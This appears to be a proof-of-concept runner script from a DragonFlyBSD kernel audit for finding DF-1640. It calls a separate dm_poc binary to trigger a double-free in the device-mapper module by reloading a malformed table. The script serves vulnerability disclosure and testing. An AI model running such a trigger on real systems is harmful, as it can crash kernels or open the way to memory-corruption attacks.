DragonFlyBSD Kernel Audit
DF-1640 / run.sh
← back to finding ↓ download raw
1
2
3
4
5
6
#!/bin/sh
# DF-1640: reload with two table entries, second lacks params -> double-free of str
# Precondition: admin has loaded dm KLD module (kldload dm).
# Helper steps: create device first, then trigger.
./dm_poc create 2>/dev/null || true
./dm_poc 1640